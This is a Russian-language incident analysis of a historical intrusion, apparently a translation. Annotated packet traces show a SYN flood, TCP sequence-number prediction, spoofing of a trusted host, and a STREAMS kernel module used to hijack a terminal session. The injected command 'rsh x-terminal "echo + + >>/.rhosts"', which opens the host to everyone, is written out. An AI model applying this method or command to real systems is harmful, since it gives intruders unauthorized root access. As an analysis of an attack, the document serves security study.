14:18:24.382841 130.92.6.97.619 > server.login: S
1382726979:1382726979(0) win 4096
14:18:24.443309 130.92.6.97.620 > server.login: S
1382726980:1382726980(0) win 4096
14:18:24.643249 130.92.6.97.621 > server.login: S
1382726981:1382726981(0) win 4096
14:18:24.906546 130.92.6.97.622 > server.login: S
1382726982:1382726982(0) win 4096
14:18:24.963768 130.92.6.97.623 > server.login: S
1382726983:1382726983(0) win 4096
14:18:25.022853 130.92.6.97.624 > server.login: S
1382726984:1382726984(0) win 4096
14:18:25.153536 130.92.6.97.625 > server.login: S
1382726985:1382726985(0) win 4096
14:18:25.400869 130.92.6.97.626 > server.login: S
1382726986:1382726986(0) win 4096
14:18:25.483127 130.92.6.97.627 > server.login: S
1382726987:1382726987(0) win 4096
14:18:25.599582 130.92.6.97.628 > server.login: S
1382726988:1382726988(0) win 4096
14:18:25.653131 130.92.6.97.629 > server.login: S
1382726989:1382726989(0) win 4096
server
сгенерировал SYN-ACK для первых восьми
SYN запросов перед тем как очередь
соединений полностью зполнилась.
server периодически перетрансли- рует
эти ACK как не требуещие ответа.
Теперь мы видим 20 попыток
соединения от apollo.it.luc.edu с x-terminal.shell.
Целью применения этих попыток была
попытка определения упорной
генеративной способности TCP
числового генератора x-terminal. Hадо
заметить, что инициализирующая
запись номера увеличивалась на
один больше для каждого соединения,
указывая на то, что SYN пакеты HЕ были
сгенерированы TCP обработчиком
системы. Hиже приведены результаты
RST сгенерированные в ответ на
каждый неопределенный SYN-ACK, поэтому
очередь соединения на x-terminal не
заполнилась:
14:18:25.906002
apollo.it.luc.edu.1000 > x-terminal.shell: S
1382726990:1382726990(0) win 4096
14:18:26.094731 x-terminal.shell > apollo.it.luc.edu.1000: S
2021824000:2021824000(0) ack 1382726991 win 4096
14:18:26.172394 apollo.it.luc.edu.1000 > x-terminal.shell: R
1382726991:1382726991(0) win 0
14:18:26.507560 apollo.it.luc.edu.999 > x-terminal.shell: S
1382726991:1382726991(0) win 4096
14:18:26.694691 x-terminal.shell > apollo.it.luc.edu.999: S
2021952000:2021952000(0) ack 1382726992 win 4096
14:18:26.775037 apollo.it.luc.edu.999 > x-terminal.shell: R
1382726992:1382726992(0) win 0
14:18:26.775395 apollo.it.luc.edu.999 > x-terminal.shell: R
1382726992:1382726992(0) win 0
14:18:27.014050 apollo.it.luc.edu.998 > x-terminal.shell: S
1382726992:1382726992(0) win 4096
14:18:27.174846 x-terminal.shell > apollo.it.luc.edu.998: S
2022080000:2022080000(0) ack 1382726993 win 4096
14:18:27.251840 apollo.it.luc.edu.998 > x-terminal.shell: R
1382726993:1382726993(0) win 0
14:18:27.544069 apollo.it.luc.edu.997 > x-terminal.shell: S
1382726993:1382726993(0) win 4096
14:18:27.714932 x-terminal.shell > apollo.it.luc.edu.997: S
2022208000:2022208000(0) ack 1382726994 win 4096
14:18:27.794456 apollo.it.luc.edu.997 > x-terminal.shell: R
1382726994:1382726994(0) win 0
14:18:28.054114 apollo.it.luc.edu.996 > x-terminal.shell: S
1382726994:1382726994(0) win 4096
14:18:28.224935 x-terminal.shell > apollo.it.luc.edu.996: S
2022336000:2022336000(0) ack 1382726995 win 4096
14:18:28.305578 apollo.it.luc.edu.996 > x-terminal.shell: R
1382726995:1382726995(0) win 0
14:18:28.564333 apollo.it.luc.edu.995 > x-terminal.shell: S
1382726995:1382726995(0) win 4096
14:18:28.734953 x-terminal.shell > apollo.it.luc.edu.995: S
2022464000:2022464000(0) ack 1382726996 win 4096
14:18:28.811591 apollo.it.luc.edu.995 > x-terminal.shell: R
1382726996:1382726996(0) win 0
14:18:29.074990 apollo.it.luc.edu.994 > x-terminal.shell: S
1382726996:1382726996(0) win 4096
14:18:29.274572 x-terminal.shell > apollo.it.luc.edu.994: S
2022592000:2022592000(0) ack 1382726997 win 4096
14:18:29.354139 apollo.it.luc.edu.994 > x-terminal.shell: R
1382726997:1382726997(0) win 0
14:18:29.354616 apollo.it.luc.edu.994 > x-terminal.shell: R
1382726997:1382726997(0) win 0
14:18:29.584705 apollo.it.luc.edu.993 > x-terminal.shell: S
1382726997:1382726997(0) win 4096
14:18:29.755054 x-terminal.shell > apollo.it.luc.edu.993: S
2022720000:2022720000(0) ack 1382726998 win 4096
14:18:29.840372 apollo.it.luc.edu.993 > x-terminal.shell: R
1382726998:1382726998(0) win 0
14:18:30.094299 apollo.it.luc.edu.992 > x-terminal.shell: S
1382726998:1382726998(0) win 4096
14:18:30.265684 x-terminal.shell > apollo.it.luc.edu.992: S
2022848000:2022848000(0) ack 1382726999 win 4096
14:18:30.342506 apollo.it.luc.edu.992 > x-terminal.shell: R
1382726999:1382726999(0) win 0
14:18:30.604547 apollo.it.luc.edu.991 > x-terminal.shell: S
1382726999:1382726999(0) win 4096
14:18:30.775232 x-terminal.shell > apollo.it.luc.edu.991: S
2022976000:2022976000(0) ack 1382727000 win 4096
14:18:30.852084 apollo.it.luc.edu.991 > x-terminal.shell: R
1382727000:1382727000(0) win 0
14:18:31.115036 apollo.it.luc.edu.990 > x-terminal.shell: S
1382727000:1382727000(0) win 4096
14:18:31.284694 x-terminal.shell > apollo.it.luc.edu.990: S
2023104000:2023104000(0) ack 1382727001 win 4096
14:18:31.361684 apollo.it.luc.edu.990 > x-terminal.shell: R
1382727001:1382727001(0) win 0
14:18:31.627817 apollo.it.luc.edu.989 > x-terminal.shell: S
1382727001:1382727001(0) win 4096
14:18:31.795260 x-terminal.shell > apollo.it.luc.edu.989: S
2023232000:2023232000(0) ack 1382727002 win 4096
14:18:31.873056 apollo.it.luc.edu.989 > x-terminal.shell: R
1382727002:1382727002(0) win 0
14:18:32.164597 apollo.it.luc.edu.988 > x-terminal.shell: S
1382727002:1382727002(0) win 4096
14:18:32.335373 x-terminal.shell > apollo.it.luc.edu.988: S
2023360000:2023360000(0) ack 1382727003 win 4096
14:18:32.413041 apollo.it.luc.edu.988 > x-terminal.shell: R
1382727003:1382727003(0) win 0
14:18:32.674779 apollo.it.luc.edu.987 > x-terminal.shell: S
1382727003:1382727003(0) win 4096
14:18:32.845373 x-terminal.shell > apollo.it.luc.edu.987: S
2023488000:2023488000(0) ack 1382727004 win 4096
14:18:32.922158 apollo.it.luc.edu.987 > x-terminal.shell: R
1382727004:1382727004(0) win 0
14:18:33.184839 apollo.it.luc.edu.986 > x-terminal.shell: S
1382727004:1382727004(0) win 4096
14:18:33.355505 x-terminal.shell > apollo.it.luc.edu.986: S
2023616000:2023616000(0) ack 1382727005 win 4096
14:18:33.435221 apollo.it.luc.edu.986 > x-terminal.shell: R
1382727005:1382727005(0) win 0
14:18:33.695170 apollo.it.luc.edu.985 > x-terminal.shell: S
1382727005:1382727005(0) win 4096
14:18:33.985966 x-terminal.shell > apollo.it.luc.edu.985: S
2023744000:2023744000(0) ack 1382727006 win 4096
14:18:34.062407 apollo.it.luc.edu.985 > x-terminal.shell: R
1382727006:1382727006(0) win 0
14:18:34.204953 apollo.it.luc.edu.984 > x-terminal.shell: S
1382727006:1382727006(0) win 4096
14:18:34.375641 x-terminal.shell > apollo.it.luc.edu.984: S
2023872000:2023872000(0) ack 1382727007 win 4096
14:18:34.452830 apollo.it.luc.edu.984 > x-terminal.shell: R
1382727007:1382727007(0) win 0
14:18:34.714996 apollo.it.luc.edu.983 > x-terminal.shell: S
1382727007:1382727007(0) win 4096
14:18:34.885071 x-terminal.shell > apollo.it.luc.edu.983: S
2024000000:2024000000(0) ack 1382727008 win 4096
14:18:34.962030 apollo.it.luc.edu.983 > x-terminal.shell: R
1382727008:1382727008(0) win 0
14:18:35.225869 apollo.it.luc.edu.982 > x-terminal.shell: S
1382727008:1382727008(0) win 4096
14:18:35.395723 x-terminal.shell > apollo.it.luc.edu.982: S
2024128000:2024128000(0) ack 1382727009 win 4096
14:18:35.472150 apollo.it.luc.edu.982 > x-terminal.shell: R
1382727009:1382727009(0) win 0
14:18:35.735077 apollo.it.luc.edu.981 > x-terminal.shell: S
1382727009:1382727009(0) win 4096
14:18:35.905684 x-terminal.shell > apollo.it.luc.edu.981: S
2024256000:2024256000(0) ack 1382727010 win 4096
14:18:35.983078 apollo.it.luc.edu.981 > x-terminal.shell: R
1382727010:1382727010(0) win 0
Hадо заметить,
что каждый SYN-ACK посланный с x-terminal
имел очередной номер на 128,000 больше
предыдущего.
Теперь мы видим определенный SYN
(запрос на соединение) идущий от
server.login к x-terminal.shell. Было установлено
атакующим, что x-terminal "верит"
запросам с сервера, поэтому x-terminal
будет принимать и обрабатывать
пакеты идущие с сервера (или кого-то
управляющим сервером).
x-terminal отвечает server пакетом SYN-ACK,
который должен быть обработан для
того, чтобы соединение было
открыто. Так как сам сервер
игнорирует пакеты идущие на server.login,
этот ACK остается необработаным.
В нормальном состоянии, пакетный
номер от SYN-ACK требуется для
нормальной генерации правильного
пакета ACK. В данном случае,
атакующий является в состоянии
предугадать пакетный номер
находящийся и составляющий SYN-ACK,
базируясь на полученной технологии
и алгоритме TCP генератора пакетных
чисел x-terminal, и это дает возможность
обработать SYN-ACK без транслирования
процесса:
14:18:36.245045
server.login > x-terminal.shell: S 1382727010:1382727010(0)
win 4096
14:18:36.755522 server.login > x-terminal.shell: . ack
2024384001 win 4096
Машина, с которой происходит атака
адреса, теперь имеет одностороннее
соединение с x-terminal.shell которое
выглядит как соединение с
server.login.Эта система может управлять
соединением, может направлять,
получать и обрабатывать данные
идушие от x-terminal.shell. С системы идет
запрос:
14:18:37.265404
server.login > x-terminal.shell: P 0:2(2) ack 1 win 4096
14:18:37.775872 server.login > x-terminal.shell: P 2:7(5) ack
1 win 4096
14:18:38.287404 server.login > x-terminal.shell: P 7:32(25)
ack 1 win 4096
который преобразуется:
14:18:37
server# rsh x-terminal "echo + + >>/.rhosts"
Общее время которое прошло с
момента попадания первого
перехваченного пакета составляло
меньше 16 секунд. После чего система
произвела отключение:
14:18:41.347003
server.login > x-terminal.shell: . ack 2 win 4096
14:18:42.255978 server.login > x-terminal.shell: . ack 3 win
4096
14:18:43.165874 server.login > x-terminal.shell: F 32:32(0)
ack 3 win 4096
14:18:52.179922 server.login > x-terminal.shell: R
1382727043:1382727043(0) win 4096
14:18:52.236452 server.login > x-terminal.shell: R
1382727044:1382727044(0) win 4096
Далее появились RST пакеты для
снятия "полуоткрытых"
соединений и освобождения очереди
соединений server.login:
14:18:52.298431
130.92.6.97.600 > server.login: R 1382726960:1382726960(0) win
4096
14:18:52.363877 130.92.6.97.601 > server.login: R
1382726961:1382726961(0) win 4096
14:18:52.416916 130.92.6.97.602 > server.login: R
1382726962:1382726962(0) win 4096
14:18:52.476873 130.92.6.97.603 > server.login: R
1382726963:1382726963(0) win 4096
14:18:52.536573 130.92.6.97.604 > server.login: R
1382726964:1382726964(0) win 4096
14:18:52.600899 130.92.6.97.605 > server.login: R
1382726965:1382726965(0) win 4096
14:18:52.660231 130.92.6.97.606 > server.login: R
1382726966:1382726966(0) win 4096
14:18:52.717495 130.92.6.97.607 > server.login: R
1382726967:1382726967(0) win 4096
14:18:52.776502 130.92.6.97.608 > server.login: R
1382726968:1382726968(0) win 4096
14:18:52.836536 130.92.6.97.609 > server.login: R
1382726969:1382726969(0) win 4096
14:18:52.937317 130.92.6.97.610 > server.login: R
1382726970:1382726970(0) win 4096
14:18:52.996777 130.92.6.97.611 > server.login: R
1382726971:1382726971(0) win 4096
14:18:53.056758 130.92.6.97.612 > server.login: R
1382726972:1382726972(0) win 4096
14:18:53.116850 130.92.6.97.613 > server.login: R
1382726973:1382726973(0) win 4096
14:18:53.177515 130.92.6.97.614 > server.login: R
1382726974:1382726974(0) win 4096
14:18:53.238496 130.92.6.97.615 > server.login: R
1382726975:1382726975(0) win 4096
14:18:53.297163 130.92.6.97.616 > server.login: R
1382726976:1382726976(0) win 4096
14:18:53.365988 130.92.6.97.617 > server.login: R
1382726977:1382726977(0) win 4096
14:18:53.437287 130.92.6.97.618 > server.login: R
1382726978:1382726978(0) win 4096
14:18:53.496789 130.92.6.97.619 > server.login: R
1382726979:1382726979(0) win 4096
14:18:53.556753 130.92.6.97.620 > server.login: R
1382726980:1382726980(0) win 4096
14:18:53.616954 130.92.6.97.621 > server.login: R
1382726981:1382726981(0) win 4096
14:18:53.676828 130.92.6.97.622 > server.login: R
1382726982:1382726982(0) win 4096
14:18:53.736734 130.92.6.97.623 > server.login: R
1382726983:1382726983(0) win 4096
14:18:53.796732 130.92.6.97.624 > server.login: R
1382726984:1382726984(0) win 4096
14:18:53.867543 130.92.6.97.625 > server.login: R
1382726985:1382726985(0) win 4096
14:18:53.917466 130.92.6.97.626 > server.login: R
1382726986:1382726986(0) win 4096
14:18:53.976769 130.92.6.97.627 > server.login: R
1382726987:1382726987(0) win 4096
14:18:54.039039 130.92.6.97.628 > server.login: R
1382726988:1382726988(0) win 4096
14:18:54.097093 130.92.6.97.629 > server.login: R
1382726989:1382726989(0) win 4096
server.login начал поддержку соединений.
После того как был получен
root-доступ к системе посредством
атаки IP адреса, в системе был
откомпилирован и установлен
загрузочный модуль ядра называемый
"tap-2.01". Модуль был установлен
на x-terminal:
x-terminal%
modstat
Id Type Loadaddr Size B-major C-major Sysnum Mod Name
1 Pdrv ff050000 1000 59. tap/tap-2.01 alpha
x-terminal%
ls -l /dev/tap
crwxrwxrwx 1 root 37, 59 Dec 25 14:40 /dev/tap
Этот модуль оказался загрузочным
модулем ядра STREAM кторый был
вставлен в существующий стэк STREAM и
использовался для перехвата
контроля над tty устройством. Он был
использован для перехвата сессии
соединения с target приблизительно в
14:51.
Конечно, никакая атака не можеь
быть завершенной без персонального
участия:
ftp://ftp.sdsc.edu/pub/security/sounds/tweedle-dee.au
ftp://ftp.sdsc.edu/pub/security/sounds/tweedle-dum.au
Здесь находятся аудио-файлы в
формате Sun, 8-bit u-law, 8 khz sample rate.